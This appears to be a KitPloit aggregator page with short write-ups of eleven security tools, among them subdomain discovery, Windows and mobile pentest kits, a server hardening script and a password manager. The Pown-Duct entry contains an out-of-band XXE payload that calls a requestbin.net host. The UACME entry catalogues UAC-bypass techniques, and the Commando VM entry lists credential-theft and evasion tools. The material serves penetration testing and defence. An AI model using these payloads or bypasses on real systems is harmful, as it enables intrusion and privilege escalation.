Quantcast
Channel: KitPloit - PenTest Tools!
Viewing all 5854 articles
Browse latest View live

Findomain - A Cross-Platform Tool That Use Certificate Transparency Logs To Find Subdomains

July 11, 2019, 3:05 pm
$
0
0

A cross-platform tool that use CertificatesTransparency logs to find subdomains. We currently support Linux, Windows and MacOS.

How it works?
It tool doesn't use the common methods for sub(domains) discover, the tool uses Certificate Transparency logs to find subdomains and it method make it tool very faster and reliable. The tool make use of multiple public available APIs to perform the search. If you want to know more about Certificate Transparency logs, read https://www.certificate-transparency.org/

Installation Linux
If you want to install it, you can do that manually compiling the source or using the precompiled binary.
Manually: You need to have Rust installed in your computer first.
$ git clone https://github.com/Edu4rdSHL/findomain.git
$ cd findomain
$ cargo build --release
$ sudo cp target/release/findomain /usr/bin/
$ findomain
Using the binary:
$ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-linux
$ chmod +x findomain-linux
$ ./findomain-linux
If you are using the BlackArch Linux distribution, you just need to use:
$ sudo pacman -S findomain

Installation Windows
Download the binary from https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-windows.exe
Open a CMD shell and go to the dir where findomain-windows.exe was downloaded.
Exec: findomain-windows in the CMD shell.

Installation MacOS
$ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-osx
$ chmod +x findomain-osx.dms
$ ./findomain-osx.dms

Usage
You can use the tool in two ways, only discovering the domain name or discovering the domain + the IP address.
findomain 0.1.4
Eduard Tolosa <tolosaeduard@gmail.com>
A tool that use Certificates Transparency logs to find subdomains.

USAGE:
    findomain [FLAGS] [OPTIONS]

FLAGS:
    -a, --all-apis    Use all the available APIs to perform the search. It take more time but you will have a lot of
                      more results.
    -h, --help        Prints help information
    -i, --get-ip      Return the subdomain list with IP address if resolved.
    -V, --version     Prints version information

OPTIONS:
    -f, --file <file>        Sets the input file to use.
    -o, --output <output>    Write data to output file in the specified format. [possible values: txt, csv, json]
    -t, --target <target>    Target host

Examples
  1. Make a simple search of subdomains and print the info in the screen:
findomain -t example.com
  1. Make a simple search of subdomains using all the APIs and print the info in the screen:
findomain -t example.com -a
  1. Make a search of subdomains and export the data to a CSV file:
findomain -t example.com -o csv
  1. Make a search of subdomains using all the APIs and export the data to a CSV file:
findomain -t example.com -a -o csv
  1. Make a search of subdomains and resolve the IP address of subdomains (if possible):
findomain -t example.com -i
  1. Make a search of subdomains with all the APIs and resolve the IP address of subdomains (if possible):
findomain -t example.com -i -a
  1. Make a search of subdomains with all the APIs and resolve the IP address of subdomains (if possible), exporting the data to a CSV file:
findomain -t example.com -i -a -o csv

Features
  • Discover subdomains without brute-force, it tool uses Certificate Transparency Logs.
  • Discover subdomains with or without IP address according to user arguments.
  • Read target from user argument (-t).
  • Read a list of targets from file and discover their subdomains with or without IP and also write to output files per-domain if specified by the user, recursively.
  • Write output to TXT file.
  • Write output to CSV file.
  • Write output to JSON file.
  • Cross platform support: Linux, Windows, MacOS.
  • Optional multiple API support.

Issues and requests
If you have a problem or a feature request, open an issue.


Search

Commando VM v1.3 - The First Full Windows-based Penetration Testing Virtual Machine Distribution

July 12, 2019, 5:45 am
$
0
0

Welcome to CommandoVM - a fully customized, Windows-based security distribution for penetration testing and red teaming.

Installation (Install Script)

Requirements
  • Windows 7 Service Pack 1 or Windows 10
  • 60 GB Hard Drive
  • 2 GB RAM

Recommended
  • Windows 10
  • 80+ GB Hard Drive
  • 4+ GB RAM
  • 2 network adapters
  • Enable Virtualization support for VM

Instructions
  1. Create and configure a new Windows Virtual Machine
  • Ensure VM is updated completely. You may have to check for updates, reboot, and check again until no more remain
  • Take a snapshot of your machine!
  • Download and copy install.ps1 on your newly configured machine.
  • Open PowerShell as an Administrator
  • Enable script execution by running the following command:
    • Set-ExecutionPolicy Unrestricted
  • Finally, execute the installer script as follows:
    • .\install.ps1
    • You can also pass your password as an argument: .\install.ps1 -password <password>
The script will set up the Boxstarter environment and proceed to download and install the Commando VM environment. You will be prompted for the administrator password in order to automate host restarts during installation. If you do not have a password set, hitting enter when prompted will also work.

Installing a new package
Commando VM uses the Chocolatey Windows package manager. It is easy to install a new package. For example, enter the following command as Administrator to deploy Github Desktop on your system:
cinst github

Staying up to date
Type the following command to update all of the packages to the most recent version:
cup all

Installed Tools

Active Directory Tools
  • Remote Server Administration Tools (RSAT)
  • SQL Server Command Line Utilities
  • Sysinternals

Command & Control
  • Covenant
  • PoshC2
  • WMImplant
  • WMIOps

Developer Tools
  • Dep
  • Git
  • Go
  • Java
  • Python 2
  • Python 3 (default)
  • Ruby
  • Ruby Devkit
  • Visual Studio 2017 Build Tools (Windows 10)
  • Visual Studio Code

Evasion
  • CheckPlease
  • Demiguise
  • DefenderCheck
  • DotNetToJScript
  • Invoke-CradleCrafter
  • Invoke-DOSfuscation
  • Invoke-Obfuscation
  • Invoke-Phant0m
  • Not PowerShell (nps)
  • PS>Attack
  • PSAmsi
  • Pafishmacro
  • PowerLessShell
  • PowerShdll
  • StarFighters

Exploitation
  • ADAPE-Script
  • API Monitor
  • CrackMapExec
  • CrackMapExecWin
  • DAMP
  • EvilClippy
  • Exchange-AD-Privesc
  • FuzzySec's PowerShell-Suite
  • FuzzySec's Sharp-Suite
  • Generate-Macro
  • GhostPack
    • Rubeus
    • SafetyKatz
    • Seatbelt
    • SharpDPAPI
    • SharpDump
    • SharpRoast
    • SharpUp
    • SharpWMI
  • GoFetch
  • Impacket
  • Invoke-ACLPwn
  • Invoke-DCOM
  • Invoke-PSImage
  • Invoke-PowerThIEf
  • Juicy Potato
  • Kali Binaries for Windows
  • LuckyStrike
  • MetaTwin
  • Metasploit
  • Mr. Unikod3r's RedTeamPowershellScripts
  • NetshHelperBeacon
  • Nishang
  • Orca
  • PSReflect
  • PowerLurk
  • PowerPriv
  • PowerSploit
  • PowerUpSQL
  • PrivExchange
  • RottenPotatoNG
  • Ruler
  • SharpClipHistory
  • SharpExchangePriv
  • SharpExec
  • SpoolSample
  • SharpSploit
  • UACME
  • impacket-examples-windows
  • vssown
  • Vulcan

Information Gathering
  • ADACLScanner
  • ADExplorer
  • ADOffline
  • ADRecon
  • BloodHound
  • dnsrecon
  • FOCA
  • Get-ReconInfo
  • GoBuster
  • GoWitness
  • NetRipper
  • Nmap
  • PowerView
    • Dev branch included
  • SharpHound
  • SharpView
  • SpoolerScanner
  • Watson

Networking Tools
  • Citrix Receiver
  • OpenVPN
  • Proxycap
  • PuTTY
  • Telnet
  • VMWare Horizon Client
  • VMWare vSphere Client
  • VNC-Viewer
  • WinSCP
  • Windump
  • Wireshark

Password Attacks
  • ASREPRoast
  • CredNinja
  • DomainPasswordSpray
  • DSInternals
  • Get-LAPSPasswords
  • Hashcat
  • Internal-Monologue
  • Inveigh
  • Invoke-TheHash
  • KeeFarce
  • KeeThief
  • LAPSToolkit
  • MailSniper
  • Mimikatz
  • Mimikittenz
  • RiskySPN
  • SessionGopher

Reverse Engineering
  • DNSpy
  • Flare-Floss
  • ILSpy
  • PEview
  • Windbg
  • x64dbg

Utilities
  • 7zip
  • Adobe Reader
  • AutoIT
  • Cmder
  • CyberChef
  • Explorer Suite
  • Gimp
  • Greenshot
  • Hashcheck
  • Hexchat
  • HxD
  • Keepass
  • MobaXterm
  • Mozilla Thunderbird
  • Neo4j Community Edition
  • Notepad++
  • Pidgin
  • Process Hacker 2
  • SQLite DB Browser
  • Screentogif
  • Shellcode Launcher
  • Sublime Text 3
  • TortoiseSVN
  • VLC Media Player
  • Winrar
  • yEd Graph Tool

Vulnerability Analysis
  • AD Control Paths
  • Egress-Assess
  • Grouper2
  • NtdsAudit
  • PwndPasswordsNTLM
  • zBang

Web Applications
  • Burp Suite
  • Fiddler
  • Firefox
  • OWASP Zap
  • Subdomain-Bruteforce
  • Wfuzz

Wordlists
  • FuzzDB
  • PayloadsAllTheThings
  • SecLists
  • Probable-Wordlists
  • RobotsDisallowed

Changelog:
1.3 - June 28 2019
1.2 - May 31 2019
1.1 - April 30 2019
1.0.2 - April 10 2019
  • Added missing 'seclists.fireeye' package to packages.json #38
1.0.1 - March 31 2019
  • Used https instead of http to install boxstarter #10


Objection v1.6.6 - Runtime Mobile Exploration

July 12, 2019, 3:13 pm
$
0
0

objection is a runtime mobile exploration toolkit, powered by Frida. It was built with the aim of helping assess mobile applications and their security posture without the need for a jailbroken or rooted mobile device.
Note: This is not some form of jailbreak / root bypass. By using objection, you are still limited by all of the restrictions imposed by the applicable sandbox you are facing.

features
Supporting both iOS and Android and having new features and improvements added regularly as the tool is used in real world scenarios, the following is a short list of only a few key features:
For all supported platforms, objection allows you to:
  • Patch iOS and Android applications, embedding a Frida gadget that can be used with objection or just Frida itself.
  • Interact with the filesystem, listing entries as well as upload & download files where permitted.
  • Perform various memory related tasks, such as listing loaded modules and their respective exports.
  • Attempt to bypass and simulate jailbroken or rooted environments.
  • Discover loaded classes and list their respective methods.
  • Perform common SSL pinning bypasses.
  • Dynamically dump arguments from methods called as you use the target application.
  • Interact with SQLite databases inline without the need to download the targeted database and use an external tool.
  • Execute custom Frida scripts.
iOS specific features in objection include the ability to:
  • Dump the iOS keychain, and export it to a file.
  • Dump data from common storage such as NSUserDefaults and the shared NSHTTPCookieStorage.
  • Dump various formats of information in human readable forms.
  • Bypass certain forms of TouchID restrictions.
  • Watch for method executions by targeting all methods in a class, or just a single method.
  • Monitor the iOS pasteboard.
  • Dump encoded .plist files in a human readable format without relying on external parsers.
Android specific features in objection include the ability to:
  • List the applications Activities, Services and Broadcast receivers.
  • Start arbitrary Activities available in the target application.
  • Watch a class method, reporting execution as it happens.

screenshots
The following screenshots show the main objection repl, connected to a test application on both an iPad running iOS 10.2.1, and Samsung Galaxy S5 running Android 6.

A file system listing of the iOS applications main bundle



A file system listing of the Android applications bundle


iOS Keychain dumped for the current application, and later written to a file called keychain.json


Inline SQLite query tool


SSL Pinning bypass running for an iOS application


SSL Pinning bypass running for an Android application


API usage to list the currently stored iOS sharedHTTPCookieStorage


sample usage
A sample session, where objection version 0.1 is used to explore the applications environment. Newer versions have the REPL prompt set to the current applications name, however usage has remained the same:


prerequisites
To run objection, all you need is the python3 interpreter to be available. Installation via pip should take care of all of the dependencies needed. For more details, please see the prerequisites section on the project wiki.
As for the target mobile applications though, for iOS, an unencrypted IPA is needed and Android just the normal APK should be fine. If you have the source code of the iOS application you want to explore, then you can simply embed and load the FridaGadget.dylib from within the Xcode project.

installation
Installation is simply a matter of pip3 install objection. This will give you the objection command.
For more detailed update and installation instructions, please refer to the wiki page here.


Ghostfuscator - The Python Password-Protected Obfuscator Using AES Encryption

July 13, 2019, 6:12 am
$
0
0

Obfuscate python scripts making them password-protected using AES Encryption

Usage
Just execute the script, and follow the menu.

Info
Once an script is obfuscated, when running it a password asking prompt will appear, after submiting the correct password, the script will execute decrypting it's decrypted content in the memory


Dwarf - Full Featured Multi Arch/Os Debugger Built On Top Of PyQt5 And Frida

July 13, 2019, 3:20 pm
$
0
0

A debugger for reverse engineers, crackers and security analyst. Or you can call it damn, why are raspberries so fluffy or yet, duck warriors are rich as fuck. Whatever you like! Built on top of pyqt5, frida and some terrible code.

Checkout the website for features, api and examples
CHANGELOG

Something you can do with Dwarf
  • breakpoints
  • watchpoints without hardware support
  • visual emulation with auto map from target, reporting memory accesses
  • breaks module loading cycle, java classes
  • set breaks conditions and custom logics
  • inject code on each breakpointed thread
  • exchange data with your target and display it in UI
  • digging through memory, disassembly and jvm fields/functions
  • backtrace both native and java
  • takes your whole frida agent in script editor, convert hooks to breakpoints etc
  • more...
  • all of this can be done through scripting to build custom debugging logic

Pre requisites
A frida server running anywhere.

Android Session:
  • make sure you can use 'adb' command in console or Read here
  • root on the device/emulator is required!
  • make sure frida is in /system/bin|xbin with a+x permissions or eventually use Dwarf to automatically install latest frida server

Setup and run
git clone https://github.com/iGio90/Dwarf

cd Dwarf

pip3 install -r requirements.txt

python3 dwarf.py

Optionally
You can install keystone-engine to enable assembler:
Windows
x86: https://github.com/keystone-engine/keystone/releases/download/0.9.1/keystone-0.9.1-python-win32.msi
x64: https://github.com/keystone-engine/keystone/releases/download/0.9.1/keystone-0.9.1-python-win64.msi

OSX / Unix
pip3 install keystone-engine
dex2jar tools (required for baksmali/decompiling)
Guide: https://sourceforge.net/p/dex2jar/wiki/UserGuide/
Files: https://github.com/pxb1988/dex2jar/releases

On Windows add d2j folder to %PATH% and change:
'java -Xms512m -Xmx1024m -cp "%CP%" %*'
in d2j_invoke.bat to
'java -Xms512m -Xmx4096m -cp "%CP%" %*'

Settings
You can change in .dwarf
"dwarf_ui_hexedit_bpl": 32 (default: 16) - Bytes per line in hexview
"dwarf_ui_hexstyle": "upper", "lower" (default: "upper") - overall hexstyle 0xabcdef or 0xABCDEF (note: click on the "Offset (X)" in hexview to change)
"dwarf_ui_font_size": 12 (default: 12) - (note: hexview/disasm use other font wait for settingsdlg or change lib/utils.py get_os_monospace_font())


Pown-Duct - Essential Tool For Finding Blind Injection Attacks

July 14, 2019, 6:09 am
$
0
0

Essential tool for finding blind injection attacks using DNS side-channels.

Credits
This tool is part of secapps.com open-source initiative.
  ___ ___ ___   _   ___ ___  ___
 / __| __/ __| /_\ | _ \ _ \/ __|
 \__ \ _| (__ / _ \|  _/  _/\__ \
 |___/___\___/_/ \_\_| |_|  |___/
  https://secapps.com
NB: This tool is taking advantage of http://requestbin.net service. Future versions will use a dedicated, custom-built infrastructure.

Quickstart
This tool is meant to be used as part of Pown.js but it can be invoked separately as an independent tool.
Install Pown first as usual:
$ npm install -g pown@latest
Invoke directly from Pown:
$ pown duct
Otherwise, install this module locally from the root of your project:
$ npm install @pown/duct --save
Once done, invoke pown cli:
$ ./node_modules/.bin/pown-cli duct
You can also use the global pown to invoke the tool locally:
$ POWN_ROOT=. pown duct

Usage
pown duct <command>

Side-channel attack enabler

Commands:
  pown duct dns  DNS ducting

Options:
  --version  Show version number  [boolean]
  --help     Show help  [boolean]

pown duct dns
pown duct dns

DNS ducting

Options:
  --version  Show version number  [boolean]
  --help     Show help  [boolean]
  --channel  Restore channel  [string]
  --output   Output format  [string] [choices: "string", "hexdump", "json"] [default: "string"]

Tutorial
There are cases when we need to perform an attack such as sql injection, XSS, XXE or SSRF but the target application is not providing any indication that it is vulnerable. One way to be sure if a vulnerability is present is to try to inject a valid attack vector which forces a DNS resolver to ask for a controlled domain. If the resolution is successful, the attack will be considered successful.
NOTE: You might be familiar with Burp Collaborator which provides a similar service for customers.
First, we need a disposable dns name to resolve:
$ pown duct dns


Using the provided DNS, compose your payload. For example, the following could trigger a DNS resolution if a XXE vulnerability is present.
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY bar SYSTEM "http://showmethemoney.bfa8b8d3c25f09d5429f.d.requestbin.net">
]>
<foo>
&bar;
</foo>
If the attack was successful, we will get a message in the terminal.



PasteHunter - Scanning Pastebin With Yara Rules

July 14, 2019, 3:11 pm
$
0
0

PasteHunter is a python3 application that is designed to query a collection of sites that host publicly pasted data. For all the pasts it finds it scans the raw contents against a series of Yara rules looking for information that can be used by an organisation or a researcher.
For setup instructions please see the official documentation https://pastehunter.readthedocs.io/en/latest/installation.html

Supported Inputs
Pastehunter currently has support for the following sites:
  • pastebin.com
  • gist.github.com
  • slexy.org
  • stackexchange # There are about 176!

Supported Outputs
Pastehunter supports several output modules:
  • dump to ElasticSearch DB (default).
  • Email alerts (SMTP).
  • Slack Channel notifications.
  • Dump to JSON file.
  • Dump to CSV file.
  • Send to syslog.
For examples of data discovered using pastehunter check out my posts https://techanarchy.net/blog/hunting-pastebin-with-pastehunter and https://techanarchy.net/blog/pastehunter-the-results


Passpie - Multiplatform Command-Line Password Manager

July 15, 2019, 6:30 am
$
0
0

Passpie is a command line tool to manage passwords from the terminal with a colorful and configurable interface. Use a master passphrase to decrypt login credentials, copy passwords to clipboard, syncronize with a git repository, check the state of your passwords, and more.
Password files are encrypted using GnuPG and saved into yaml text files. Passpie supports Linux, OSX and Windows.

What does it look like? Here is an example of a simple Passpie usage:
passpie init
passpie add foo@example.com --random
passpie add bar@example.com --pattern "[0-9]{5}[a-z]{5}"
passpie update foo@example --comment "Hello"
passpie
passpie copy foo@example.com
Outputs:
===========  =======  ==========  =========
Name         Login    Password    Comment
===========  =======  ==========  =========
example.com  bar      ********
example.com  foo      ********    Hello
===========  =======  ==========  =========
Password copied to clipboard
Check example remote passpie database: https://github.com/marcwebbie/passpiedb.

Install
pip install passpie
Or if you are on a mac, install via Homebrew:
brew install passpie

Dependencies
Passpie depends on GnuPG for encryption

Commands
Usage: passpie [OPTIONS] COMMAND [ARGS]...

Options:
  -D, --database TEXT  Database path or url to remote repository
  --autopull TEXT      Autopull changes from remote pository
  --autopush TEXT      Autopush changes to remote pository
  --config PATH        Path to configuration file
  -v, --verbose        Activate verbose output
  --version            Show the version and exit.
  --help               Show this message and exit.

Commands:
  add       Add new credential to database
  complete  Generate completion scripts for shells
  config    Show current configuration for shell
  copy      Copy credential password to clipboard/stdout
  export    Export credentials in plain text
  import    Import credentials from    path
  init      Initialize new passpie database
  list      Print credential as a table
  log       Shows passpie database changes history
  purge     Remove all credentials from database
  remove    Remove credential
  reset     Renew passpie database and re-encrypt...
  search    Search credentials by regular expressions
  status    Diagnose database for improvements
  update    Update credential


Learn more



Search

Project iKy v2.0.0 - Tool That Collects Information From An Email And Shows Results In A Nice Visual Interface

July 15, 2019, 2:39 pm
$
0
0

Project iKy is a tool that collects information from an email and shows results in a nice visual interface.

Visit the Gitlab Page of the Project

Project

First of all we want to advice you that we have changed the Frontend from AngularJS to Angular 7. For this reason we left the project with AngularJS as Frontend in the iKy-v1 branch and the documentation for its installation here.
The reason of changing the Frontend was to update the technology and get an easier way of installation.

Video


Installation

Clone repository

git clone https://gitlab.com/kennbroorg/iKy.git

Install Backend


Redis
You must install Redis
wget http://download.redis.io/redis-stable.tar.gz
tar xvzf redis-stable.tar.gz
cd redis-stable
make
sudo make install
And turn on the server in a terminal
redis-server

Python stuff and Celery
You must install the libraries inside requirements.txt
pip install -r requirements.txt
And turn on Celery in another terminal, within the directory backend
./celery.sh
Finally, again, in another terminal turn on backend app from directory backend
python app.py

Install Frontend


Node
First of all, install nodejs.

Dependencies
Inside the directory frontend install the dependencies
npm install

Turn on Frontend Server
Finally, to run frontend server, execute:
npm start

Browser

Open the browser in this url

Config API Keys

Once the application is loaded in the browser, you should go to the Api Keys option and load the values of the APIs that are needed.

  • Fullcontact: Generate the APIs from here
  • Twitter: Generate the APIs from here
  • Linkedin: Only the user and password of your account must be loaded

Change from latest version

  • Add more analysis on twitter
  • Reactive Have I Been Pwned (BLOCK, NOLEAK, LEAK)
  • Change the main cover
  • Change the secondary cover
  • Add Modules Implemented to main cover
  • Add Contributors to main cover
  • Add Projects to main cover
  • Add People to main cover
  • Add Friends to main cover
  • Change visual windows, sidepanel, footer and shadows
  • Change validation indicators
  • Change validation filters



JShielder v2.4 - Hardening Script For Linux Servers/ Secure LAMP-LEMP Deployer/ CIS Benchmark G

July 16, 2019, 6:54 am
$
0
0



JSHielder is an Open Source Bash Script developed to help SysAdmin and developers secure there Linux Servers in which they will be deploying any web application or services. This tool automates the process of installing all the necessary packages to host a web application and Hardening a Linux server with little interaction from the user. Newly added script follows CIS Benchmark Guidance to establish a Secure configuration posture for Linux systems.

This tool is a Bash Script that hardens the Linux Server security automatically and the steps followed are:
  • Configures a Hostname
  • Reconfigures the Timezone
  • Updates the entire System
  • Creates a New Admin user so you can manage your server safely without the need of doing remote connections with root.
  • Helps user Generate Secure RSA Keys, so that remote access to your server is done exclusive from your local pc and no Conventional password
  • Configures, Optimize and secures the SSH Server (Some Settings Following CIS Benchmark)
  • Configures IPTABLES Rules to protect the server from common attacks
  • Disables unused FileSystems and Network protocols
  • Protects the server against Brute Force attacks by installing a configuring fail2ban
  • Installs and Configure Artillery as a Honeypot, Monitoring, Blocking and Alerting tool
  • Installs PortSentry
  • Install, configure, and optimize MySQL
  • Install the Apache Web Server
  • Install, configure and secure PHP
  • Secure Apache via configuration file and with installation of the Modules ModSecurity, ModEvasive, Qos and SpamHaus
  • Secures NginX with the Installation of ModSecurity NginX module
  • Installs RootKit Hunter
  • Secures Root Home and Grub Configuration Files
  • Installs Unhide to help Detect Malicious Hidden Processes
  • Installs Tiger, A Security Auditing and Intrusion Prevention system
  • Restrict Access to Apache Config Files
  • Disables Compilers
  • Creates Daily Cron job for System Updates
  • Kernel Hardening via sysctl configuration File (Tweaked)
  • /tmp Directory Hardening
  • PSAD IDS installation
  • Enables Process Accounting
  • Enables Unattended Upgrades
  • MOTD and Banners for Unauthorized access
  • Disables USB Support for Improved Security (Optional)
  • Configures a Restrictive Default UMASK
  • Configures and enables Auditd
  • Configures Auditd rules following CIS Benchmark
  • Sysstat install
  • ArpWatch install
  • Additional Hardening steps following CIS Benchmark
  • Secures Cron
  • Automates the process of setting a GRUB Bootloader Password
  • Secures Boot Settings
  • Sets Secure File Permissions for Critical System Files
#NEW!!
  • LEMP Deployment with ModSecurity

CIS Benchmark JShielder Script Added

To Run the tool
./jshielder.sh
As the Root user

Issues
Having Problems, please open a New Issue for JShielder on Github.

Distro Availability
  • Ubuntu Server 16.04LTS
  • Ubuntu Server 18.04LTS

ChangeLog
v2.4 Added LEMP Deployment with ModSecurity
v2.3 More Hardening steps Following some CIS Benchmark items for LAMP Deployer
v2.2.1 Removed suhosing installation on Ubuntu 16.04, Fixed MySQL Configuration, GRUB Bootloader Setup function, Server IP now obtain via ip route to not rely on interface naming
v2.2 Added new Hardening option following CIS Benchmark Guidance
v2.1 Hardened SSH Configuration, Tweaked Kernel Security Config, Fixed iptables rules not loading on Boot. Added auditd, sysstat, arpwatch install.
v2.0 More Deployment Options, Selection Menu, PHP Suhosin installation, Cleaner Code,
v1.0 - New Code
Developed by Jason Soto
https://www.jasonsoto.com
https://github.com/jsitech
Twitter = @JsiTech


UACME - Defeating Windows User Account Control

July 16, 2019, 3:08 pm
$
0
0

Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.

System Requirements
  • x86-32/x64 Windows 7/8/8.1/10 (client, some methods however works on server version too).
  • Admin account with UAC set on default settings required.

Usage
Run executable from command line: akagi32 [Key] [Param] or akagi64 [Key] [Param]. See "Run examples" below for more info.
First param is number of method to use, second is optional command (executable file name including full path) to run. Second param can be empty - in this case program will execute elevated cmd.exe from system32 folder.
Keys (watch debug output with dbgview or similar for more info):
  1. Author: Leo Davidson
    • Type: Dll Hijack
    • Method: IFileOperation
    • Target(s): \system32\sysprep\sysprep.exe
    • Component(s): cryptbase.dll
    • Implementation: ucmStandardAutoElevation
    • Works from: Windows 7 (7600)
    • Fixed in: Windows 8.1 (9600)
      • How: sysprep.exe hardened LoadFrom manifest elements
  2. Author: Leo Davidson derivative
    • Type: Dll Hijack
    • Method: IFileOperation
    • Target(s): \system32\sysprep\sysprep.exe
    • Component(s): ShCore.dll
    • Implementation: ucmStandardAutoElevation
    • Works from: Windows 8.1 (9600)
    • Fixed in: Windows 10 TP (> 9600)
      • How: Side effect of ShCore.dll moving to \KnownDlls
  3. Author: Leo Davidson derivative by WinNT/Pitou
    • Type: Dll Hijack
    • Method: IFileOperation
    • Target(s): \system32\oobe\setupsqm.exe
    • Component(s): WdsCore.dll
    • Implementation: ucmStandardAutoElevation
    • Works from: Windows 7 (7600)
    • Fixed in: Windows 10 TH2 (10558)
      • How: Side effect of OOBE redesign
  4. Author: Jon Ericson, WinNT/Gootkit, mzH
    • Type: AppCompat
    • Method: RedirectEXE Shim
    • Target(s): \system32\cliconfg.exe
    • Component(s): -
    • Implementation: ucmShimRedirectEXE
    • Works from: Windows 7 (7600)
    • Fixed in: Windows 10 TP (> 9600)
      • How: Sdbinst.exe autoelevation removed, KB3045645/KB3048097 for rest Windows versions
  5. Author: WinNT/Simda
    • Type: Elevated COM interface
    • Method: ISecurityEditor
    • Target(s): HKLM registry keys
    • Component(s): -
    • Implementation: ucmSimdaTurnOffUac
    • Works from: Windows 7 (7600)
    • Fixed in: Windows 10 TH1 (10147)
      • How: ISecurityEditor interface method changed
  6. Author: Win32/Carberp
    • Type: Dll Hijack
    • Method: WUSA
    • Target(s): \ehome\mcx2prov.exe, \system32\migwiz\migwiz.exe
    • Component(s): WdsCore.dll, CryptBase.dll, CryptSP.dll
    • Implementation: ucmWusaMethod
    • Works from: Windows 7 (7600)
    • Fixed in: Windows 10 TH1 (10147)
      • How: WUSA /extract option removed
  7. Author: Win32/Carberp derivative
    • Type: Dll Hijack
    • Method: WUSA
    • Target(s): \system32\cliconfg.exe
    • Component(s): ntwdblib.dll
    • Implementation: ucmWusaMethod
    • Works from: Windows 7 (7600)
    • Fixed in: Windows 10 TH1 (10147)
      • How: WUSA /extract option removed
  8. Author: Leo Davidson derivative by Win32/Tilon
    • Type: Dll Hijack
    • Method: IFileOperation
    • Target(s): \system32\sysprep\sysprep.exe
    • Component(s): Actionqueue.dll
    • Implementation: ucmStandardAutoElevation
    • Works from: Windows 7 (7600)
    • Fixed in: Windows 8.1 (9600)
      • How: sysprep.exe hardened LoadFrom manifest
  9. Author: Leo Davidson, WinNT/Simda, Win32/Carberp derivative
    • Type: Dll Hijack
    • Method: IFileOperation, ISecurityEditor, WUSA
    • Target(s): IFEO registry keys, \system32\cliconfg.exe
    • Component(s): Attacker defined Application Verifier Dll
    • Implementation: ucmAvrfMethod
    • Works from: Windows 7 (7600)
    • Fixed in: Windows 10 TH1 (10147)
      • How: WUSA /extract option removed, ISecurityEditor interface method changed
  10. Author: WinNT/Pitou, Win32/Carberp derivative
    • Type: Dll Hijack
    • Method: IFileOperation, WUSA
    • Target(s): \system32\{New}or{Existing}\{autoelevated}.exe, e.g. winsat.exe
    • Component(s): Attacker defined dll, e.g. PowProf.dll, DevObj.dll
    • Implementation: ucmWinSATMethod
    • Works from: Windows 7 (7600)
    • Fixed in: Windows 10 TH2 (10548)
      • How: AppInfo elevated application path control hardening
  11. Author: Jon Ericson, WinNT/Gootkit, mzH
    • Type: AppCompat
    • Method: Shim Memory Patch
    • Target(s): \system32\iscsicli.exe
    • Component(s): Attacker prepared shellcode
    • Implementation: ucmShimPatch
    • Works from: Windows 7 (7600)
    • Fixed in: Windows 8.1 (9600)
      • How: Sdbinst.exe autoelevation removed, KB3045645/KB3048097 for rest Windows versions
  12. Author: Leo Davidson derivative
    • Type: Dll Hijack
    • Method: IFileOperation
    • Target(s): \system32\sysprep\sysprep.exe
    • Component(s): dbgcore.dll
    • Implementation: ucmStandardAutoElevation
    • Works from: Windows 10 TH1 (10240)
    • Fixed in: Windows 10 TH2 (10565)
      • How: sysprep.exe manifest updated
  13. Author: Leo Davidson derivative
    • Type: Dll Hijack
    • Method: IFileOperation
    • Target(s): \system32\mmc.exe EventVwr.msc
    • Component(s): elsext.dll
    • Implementation: ucmMMCMethod
    • Works from: Windows 7 (7600)
    • Fixed in: Windows 10 RS1 (14316)
      • How: Missing dependency removed
  14. Author: Leo Davidson, WinNT/Sirefef derivative
    • Type: Dll Hijack
    • Method: IFileOperation
    • Target(s): \system\credwiz.exe, \system32\wbem\oobe.exe
    • Component(s): netutils.dll
    • Implementation: ucmSirefefMethod
    • Works from: Windows 7 (7600)
    • Fixed in: Windows 10 TH2 (10548)
      • How: AppInfo elevated application path control hardening
  15. Author: Leo Davidson, Win32/Addrop, Metasploit derivative
    • Type: Dll Hijack
    • Method: IFileOperation
    • Target(s): \system32\cliconfg.exe
    • Component(s): ntwdblib.dll
    • Implementation: ucmGenericAutoelevation
    • Works from: Windows 7 (7600)
    • Fixed in: Windows 10 RS1 (14316)
      • How: Cliconfg.exe autoelevation removed
  16. Author: Leo Davidson derivative
    • Type: Dll Hijack
    • Method: IFileOperation
    • Target(s): \system32\GWX\GWXUXWorker.exe, \system32\inetsrv\inetmgr.exe
    • Component(s): SLC.dll
    • Implementation: ucmGWX
    • Works from: Windows 7 (7600)
    • Fixed in: Windows 10 RS1 (14316)
      • How: AppInfo elevated application path control and inetmgr executable hardening
  17. Author: Leo Davidson derivative
    • Type: Dll Hijack (Import forwarding)
    • Method: IFileOperation
    • Target(s): \system32\sysprep\sysprep.exe
    • Component(s): unbcl.dll
    • Implementation: ucmStandardAutoElevation2
    • Works from: Windows 8.1 (9600)
    • Fixed in: Windows 10 RS1 (14371)
      • How: sysprep.exe manifest updated
  18. Author: Leo Davidson derivative
    • Type: Dll Hijack (Manifest)
    • Method: IFileOperation
    • Target(s): \system32\taskhost.exe, \system32\tzsync.exe (any ms exe without manifest)
    • Component(s): Attacker defined
    • Implementation: ucmAutoElevateManifest
    • Works from: Windows 7 (7600)
    • Fixed in: Windows 10 RS1 (14371)
      • How: Manifest parsing logic reviewed
  19. Author: Leo Davidson derivative
    • Type: Dll Hijack
    • Method: IFileOperation
    • Target(s): \system32\inetsrv\inetmgr.exe
    • Component(s): MsCoree.dll
    • Implementation: ucmInetMgrMethod
    • Works from: Windows 7 (7600)
    • Fixed in: Windows 10 RS1 (14376)
      • How: inetmgr.exe executable manifest hardening, MitigationPolicy->ProcessImageLoadPolicy->PreferSystem32Images
  20. Author: Leo Davidson derivative
    • Type: Dll Hijack
    • Method: IFileOperation
    • Target(s): \system32\mmc.exe, Rsop.msc
    • Component(s): WbemComn.dll
    • Implementation: ucmMMCMethod
    • Works from: Windows 7 (7600)
    • Fixed in: Windows 10 RS3 (16232)
      • How: Target requires wbemcomn.dll to be signed by MS
  21. Author: Leo Davidson derivative
    • Type: Dll Hijack
    • Method: IFileOperation, SxS DotLocal
    • Target(s): \system32\sysprep\sysprep.exe
    • Component(s): comctl32.dll
    • Implementation: ucmSXSMethod
    • Works from: Windows 7 (7600)
    • Fixed in: Windows 10 RS3 (16232)
